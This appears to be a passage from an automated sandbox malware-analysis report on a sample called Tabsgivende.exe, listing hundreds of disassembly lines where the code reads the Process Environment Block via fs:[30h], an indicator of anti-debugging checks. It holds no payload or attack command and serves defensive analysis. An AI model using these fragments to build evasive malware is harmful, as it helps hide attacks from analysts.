Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225AC460 mov ecx, dword ptr fs:[00000030h] 18_2_225AC460
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22558402 mov eax, dword ptr fs:[00000030h] 18_2_22558402
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22558402 mov eax, dword ptr fs:[00000030h] 18_2_22558402
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22558402 mov eax, dword ptr fs:[00000030h] 18_2_22558402
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255A430 mov eax, dword ptr fs:[00000030h] 18_2_2255A430
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251E420 mov eax, dword ptr fs:[00000030h] 18_2_2251E420
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251E420 mov eax, dword ptr fs:[00000030h] 18_2_2251E420
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251E420 mov eax, dword ptr fs:[00000030h] 18_2_2251E420
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251C427 mov eax, dword ptr fs:[00000030h] 18_2_2251C427
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A6420 mov eax, dword ptr fs:[00000030h] 18_2_225A6420
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A6420 mov eax, dword ptr fs:[00000030h] 18_2_225A6420
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A6420 mov eax, dword ptr fs:[00000030h] 18_2_225A6420
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A6420 mov eax, dword ptr fs:[00000030h] 18_2_225A6420
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A6420 mov eax, dword ptr fs:[00000030h] 18_2_225A6420
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A6420 mov eax, dword ptr fs:[00000030h] 18_2_225A6420
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A6420 mov eax, dword ptr fs:[00000030h] 18_2_225A6420
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225204E5 mov ecx, dword ptr fs:[00000030h] 18_2_225204E5
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225544B0 mov ecx, dword ptr fs:[00000030h] 18_2_225544B0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225AA4B0 mov eax, dword ptr fs:[00000030h] 18_2_225AA4B0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225264AB mov eax, dword ptr fs:[00000030h] 18_2_225264AB
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22528550 mov eax, dword ptr fs:[00000030h] 18_2_22528550
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22528550 mov eax, dword ptr fs:[00000030h] 18_2_22528550
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255656A mov eax, dword ptr fs:[00000030h] 18_2_2255656A
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255656A mov eax, dword ptr fs:[00000030h] 18_2_2255656A
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255656A mov eax, dword ptr fs:[00000030h] 18_2_2255656A
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225B6500 mov eax, dword ptr fs:[00000030h] 18_2_225B6500
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225F4500 mov eax, dword ptr fs:[00000030h] 18_2_225F4500
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225F4500 mov eax, dword ptr fs:[00000030h] 18_2_225F4500
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225F4500 mov eax, dword ptr fs:[00000030h] 18_2_225F4500
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225F4500 mov eax, dword ptr fs:[00000030h] 18_2_225F4500
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225F4500 mov eax, dword ptr fs:[00000030h] 18_2_225F4500
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225F4500 mov eax, dword ptr fs:[00000030h] 18_2_225F4500
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225F4500 mov eax, dword ptr fs:[00000030h] 18_2_225F4500
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530535 mov eax, dword ptr fs:[00000030h] 18_2_22530535
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530535 mov eax, dword ptr fs:[00000030h] 18_2_22530535
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530535 mov eax, dword ptr fs:[00000030h] 18_2_22530535
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530535 mov eax, dword ptr fs:[00000030h] 18_2_22530535
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530535 mov eax, dword ptr fs:[00000030h] 18_2_22530535
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530535 mov eax, dword ptr fs:[00000030h] 18_2_22530535
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254E53E mov eax, dword ptr fs:[00000030h] 18_2_2254E53E
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254E53E mov eax, dword ptr fs:[00000030h] 18_2_2254E53E
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254E53E mov eax, dword ptr fs:[00000030h] 18_2_2254E53E
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254E53E mov eax, dword ptr fs:[00000030h] 18_2_2254E53E
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254E53E mov eax, dword ptr fs:[00000030h] 18_2_2254E53E
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225265D0 mov eax, dword ptr fs:[00000030h] 18_2_225265D0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255A5D0 mov eax, dword ptr fs:[00000030h] 18_2_2255A5D0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255A5D0 mov eax, dword ptr fs:[00000030h] 18_2_2255A5D0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255E5CF mov eax, dword ptr fs:[00000030h] 18_2_2255E5CF
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255E5CF mov eax, dword ptr fs:[00000030h] 18_2_2255E5CF
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225225E0 mov eax, dword ptr fs:[00000030h] 18_2_225225E0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254E5E7 mov eax, dword ptr fs:[00000030h] 18_2_2254E5E7
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254E5E7 mov eax, dword ptr fs:[00000030h] 18_2_2254E5E7
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254E5E7 mov eax, dword ptr fs:[00000030h] 18_2_2254E5E7
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254E5E7 mov eax, dword ptr fs:[00000030h] 18_2_2254E5E7
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254E5E7 mov eax, dword ptr fs:[00000030h] 18_2_2254E5E7
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254E5E7 mov eax, dword ptr fs:[00000030h] 18_2_2254E5E7
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254E5E7 mov eax, dword ptr fs:[00000030h] 18_2_2254E5E7
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254E5E7 mov eax, dword ptr fs:[00000030h] 18_2_2254E5E7
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255C5ED mov eax, dword ptr fs:[00000030h] 18_2_2255C5ED
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255C5ED mov eax, dword ptr fs:[00000030h] 18_2_2255C5ED
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255E59C mov eax, dword ptr fs:[00000030h] 18_2_2255E59C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22522582 mov eax, dword ptr fs:[00000030h] 18_2_22522582
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22522582 mov ecx, dword ptr fs:[00000030h] 18_2_22522582
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22554588 mov eax, dword ptr fs:[00000030h] 18_2_22554588
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225445B1 mov eax, dword ptr fs:[00000030h] 18_2_225445B1
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225445B1 mov eax, dword ptr fs:[00000030h] 18_2_225445B1
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A05A7 mov eax, dword ptr fs:[00000030h] 18_2_225A05A7
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A05A7 mov eax, dword ptr fs:[00000030h] 18_2_225A05A7
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A05A7 mov eax, dword ptr fs:[00000030h] 18_2_225A05A7
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22526A50 mov eax, dword ptr fs:[00000030h] 18_2_22526A50
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22526A50 mov eax, dword ptr fs:[00000030h] 18_2_22526A50
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22526A50 mov eax, dword ptr fs:[00000030h] 18_2_22526A50
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22526A50 mov eax, dword ptr fs:[00000030h] 18_2_22526A50
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22526A50 mov eax, dword ptr fs:[00000030h] 18_2_22526A50
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22526A50 mov eax, dword ptr fs:[00000030h] 18_2_22526A50
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22526A50 mov eax, dword ptr fs:[00000030h] 18_2_22526A50
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530A5B mov eax, dword ptr fs:[00000030h] 18_2_22530A5B
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530A5B mov eax, dword ptr fs:[00000030h] 18_2_22530A5B
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2259CA72 mov eax, dword ptr fs:[00000030h] 18_2_2259CA72
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2259CA72 mov eax, dword ptr fs:[00000030h] 18_2_2259CA72
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255CA6F mov eax, dword ptr fs:[00000030h] 18_2_2255CA6F
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255CA6F mov eax, dword ptr fs:[00000030h] 18_2_2255CA6F
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255CA6F mov eax, dword ptr fs:[00000030h] 18_2_2255CA6F
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225ACA11 mov eax, dword ptr fs:[00000030h] 18_2_225ACA11
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22544A35 mov eax, dword ptr fs:[00000030h] 18_2_22544A35
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22544A35 mov eax, dword ptr fs:[00000030h] 18_2_22544A35
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255CA38 mov eax, dword ptr fs:[00000030h] 18_2_2255CA38
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255CA24 mov eax, dword ptr fs:[00000030h] 18_2_2255CA24
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254EA2E mov eax, dword ptr fs:[00000030h] 18_2_2254EA2E
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22520AD0 mov eax, dword ptr fs:[00000030h] 18_2_22520AD0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22554AD0 mov eax, dword ptr fs:[00000030h] 18_2_22554AD0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22554AD0 mov eax, dword ptr fs:[00000030h] 18_2_22554AD0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22576ACC mov eax, dword ptr fs:[00000030h] 18_2_22576ACC
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22576ACC mov eax, dword ptr fs:[00000030h] 18_2_22576ACC
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22576ACC mov eax, dword ptr fs:[00000030h] 18_2_22576ACC
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255AAEE mov eax, dword ptr fs:[00000030h] 18_2_2255AAEE
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255AAEE mov eax, dword ptr fs:[00000030h] 18_2_2255AAEE
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22558A90 mov edx, dword ptr fs:[00000030h] 18_2_22558A90
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252EA80 mov eax, dword ptr fs:[00000030h] 18_2_2252EA80
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252EA80 mov eax, dword ptr fs:[00000030h] 18_2_2252EA80
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252EA80 mov eax, dword ptr fs:[00000030h] 18_2_2252EA80
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252EA80 mov eax, dword ptr fs:[00000030h] 18_2_2252EA80
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252EA80 mov eax, dword ptr fs:[00000030h] 18_2_2252EA80
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252EA80 mov eax, dword ptr fs:[00000030h] 18_2_2252EA80
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252EA80 mov eax, dword ptr fs:[00000030h] 18_2_2252EA80
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252EA80 mov eax, dword ptr fs:[00000030h] 18_2_2252EA80
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252EA80 mov eax, dword ptr fs:[00000030h] 18_2_2252EA80
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225F4A80 mov eax, dword ptr fs:[00000030h] 18_2_225F4A80
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22528AA0 mov eax, dword ptr fs:[00000030h] 18_2_22528AA0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22528AA0 mov eax, dword ptr fs:[00000030h] 18_2_22528AA0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22576AA4 mov eax, dword ptr fs:[00000030h] 18_2_22576AA4
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225B6B40 mov eax, dword ptr fs:[00000030h] 18_2_225B6B40
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225B6B40 mov eax, dword ptr fs:[00000030h] 18_2_225B6B40
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225EAB40 mov eax, dword ptr fs:[00000030h] 18_2_225EAB40
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225C8B42 mov eax, dword ptr fs:[00000030h] 18_2_225C8B42
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2251CB7E mov eax, dword ptr fs:[00000030h] 18_2_2251CB7E
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2259EB1D mov eax, dword ptr fs:[00000030h] 18_2_2259EB1D
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2259EB1D mov eax, dword ptr fs:[00000030h] 18_2_2259EB1D
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2259EB1D mov eax, dword ptr fs:[00000030h] 18_2_2259EB1D
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2259EB1D mov eax, dword ptr fs:[00000030h] 18_2_2259EB1D
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2259EB1D mov eax, dword ptr fs:[00000030h] 18_2_2259EB1D
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2259EB1D mov eax, dword ptr fs:[00000030h] 18_2_2259EB1D
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2259EB1D mov eax, dword ptr fs:[00000030h] 18_2_2259EB1D
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2259EB1D mov eax, dword ptr fs:[00000030h] 18_2_2259EB1D
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2259EB1D mov eax, dword ptr fs:[00000030h] 18_2_2259EB1D
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254EB20 mov eax, dword ptr fs:[00000030h] 18_2_2254EB20
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254EB20 mov eax, dword ptr fs:[00000030h] 18_2_2254EB20
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225E8B28 mov eax, dword ptr fs:[00000030h] 18_2_225E8B28
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225E8B28 mov eax, dword ptr fs:[00000030h] 18_2_225E8B28
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225CEBD0 mov eax, dword ptr fs:[00000030h] 18_2_225CEBD0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22540BCB mov eax, dword ptr fs:[00000030h] 18_2_22540BCB
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22540BCB mov eax, dword ptr fs:[00000030h] 18_2_22540BCB
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22540BCB mov eax, dword ptr fs:[00000030h] 18_2_22540BCB
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22520BCD mov eax, dword ptr fs:[00000030h] 18_2_22520BCD
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22520BCD mov eax, dword ptr fs:[00000030h] 18_2_22520BCD
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22520BCD mov eax, dword ptr fs:[00000030h] 18_2_22520BCD
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22528BF0 mov eax, dword ptr fs:[00000030h] 18_2_22528BF0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22528BF0 mov eax, dword ptr fs:[00000030h] 18_2_22528BF0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22528BF0 mov eax, dword ptr fs:[00000030h] 18_2_22528BF0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254EBFC mov eax, dword ptr fs:[00000030h] 18_2_2254EBFC
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225ACBF0 mov eax, dword ptr fs:[00000030h] 18_2_225ACBF0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530BBE mov eax, dword ptr fs:[00000030h] 18_2_22530BBE
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22530BBE mov eax, dword ptr fs:[00000030h] 18_2_22530BBE
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22550854 mov eax, dword ptr fs:[00000030h] 18_2_22550854
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22524859 mov eax, dword ptr fs:[00000030h] 18_2_22524859
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22524859 mov eax, dword ptr fs:[00000030h] 18_2_22524859
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22532840 mov ecx, dword ptr fs:[00000030h] 18_2_22532840
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225AE872 mov eax, dword ptr fs:[00000030h] 18_2_225AE872
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225AE872 mov eax, dword ptr fs:[00000030h] 18_2_225AE872
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225B6870 mov eax, dword ptr fs:[00000030h] 18_2_225B6870
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225B6870 mov eax, dword ptr fs:[00000030h] 18_2_225B6870
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225AC810 mov eax, dword ptr fs:[00000030h] 18_2_225AC810
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22542835 mov eax, dword ptr fs:[00000030h] 18_2_22542835
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22542835 mov eax, dword ptr fs:[00000030h] 18_2_22542835
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22542835 mov eax, dword ptr fs:[00000030h] 18_2_22542835
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22542835 mov ecx, dword ptr fs:[00000030h] 18_2_22542835
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22542835 mov eax, dword ptr fs:[00000030h] 18_2_22542835
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22542835 mov eax, dword ptr fs:[00000030h] 18_2_22542835
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255A830 mov eax, dword ptr fs:[00000030h] 18_2_2255A830
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2254E8C0 mov eax, dword ptr fs:[00000030h] 18_2_2254E8C0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255C8F9 mov eax, dword ptr fs:[00000030h] 18_2_2255C8F9
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2255C8F9 mov eax, dword ptr fs:[00000030h] 18_2_2255C8F9
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225EA8E4 mov eax, dword ptr fs:[00000030h] 18_2_225EA8E4
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225AC89D mov eax, dword ptr fs:[00000030h] 18_2_225AC89D
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22520887 mov eax, dword ptr fs:[00000030h] 18_2_22520887
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A0946 mov eax, dword ptr fs:[00000030h] 18_2_225A0946
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225AC97C mov eax, dword ptr fs:[00000030h] 18_2_225AC97C
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22546962 mov eax, dword ptr fs:[00000030h] 18_2_22546962
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22546962 mov eax, dword ptr fs:[00000030h] 18_2_22546962
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22546962 mov eax, dword ptr fs:[00000030h] 18_2_22546962
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2256096E mov eax, dword ptr fs:[00000030h] 18_2_2256096E
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2256096E mov edx, dword ptr fs:[00000030h] 18_2_2256096E
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2256096E mov eax, dword ptr fs:[00000030h] 18_2_2256096E
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225AC912 mov eax, dword ptr fs:[00000030h] 18_2_225AC912
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22518918 mov eax, dword ptr fs:[00000030h] 18_2_22518918
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_22518918 mov eax, dword ptr fs:[00000030h] 18_2_22518918
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2259E908 mov eax, dword ptr fs:[00000030h] 18_2_2259E908
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2259E908 mov eax, dword ptr fs:[00000030h] 18_2_2259E908
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A892A mov eax, dword ptr fs:[00000030h] 18_2_225A892A
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225B892B mov eax, dword ptr fs:[00000030h] 18_2_225B892B
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252A9D0 mov eax, dword ptr fs:[00000030h] 18_2_2252A9D0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252A9D0 mov eax, dword ptr fs:[00000030h] 18_2_2252A9D0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252A9D0 mov eax, dword ptr fs:[00000030h] 18_2_2252A9D0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252A9D0 mov eax, dword ptr fs:[00000030h] 18_2_2252A9D0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252A9D0 mov eax, dword ptr fs:[00000030h] 18_2_2252A9D0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_2252A9D0 mov eax, dword ptr fs:[00000030h] 18_2_2252A9D0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225549D0 mov eax, dword ptr fs:[00000030h] 18_2_225549D0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225EA9D3 mov eax, dword ptr fs:[00000030h] 18_2_225EA9D3
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225B69C0 mov eax, dword ptr fs:[00000030h] 18_2_225B69C0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225529F9 mov eax, dword ptr fs:[00000030h] 18_2_225529F9
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225529F9 mov eax, dword ptr fs:[00000030h] 18_2_225529F9
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225AE9E0 mov eax, dword ptr fs:[00000030h] 18_2_225AE9E0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A89B3 mov esi, dword ptr fs:[00000030h] 18_2_225A89B3
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A89B3 mov eax, dword ptr fs:[00000030h] 18_2_225A89B3
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225A89B3 mov eax, dword ptr fs:[00000030h] 18_2_225A89B3
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225329A0 mov eax, dword ptr fs:[00000030h] 18_2_225329A0
Source: C:\Users\user\AppData\Local\Temp\Tabsgivende.exe Code function: 18_2_225329A0 mov eax, dword ptr fs:[00000030h] 18_2_225329A0
